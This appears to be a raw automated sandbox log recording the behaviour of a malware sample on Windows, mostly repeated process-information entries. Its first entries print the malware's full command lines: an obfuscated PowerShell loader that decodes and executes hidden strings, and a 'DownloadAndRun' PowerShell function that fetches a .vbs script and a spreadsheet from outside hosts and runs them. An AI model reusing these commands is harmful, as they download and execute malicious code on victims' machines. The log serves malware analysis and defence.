            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Ree
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $ReeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4AEA7562 push ebx; iretd 7_2_00007FFB4AEA756A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4AF7935B push E8D08B48h; retf 7_2_00007FFB4AF79361
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_029438F1 pushfd ; iretd 10_2_029438FA
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
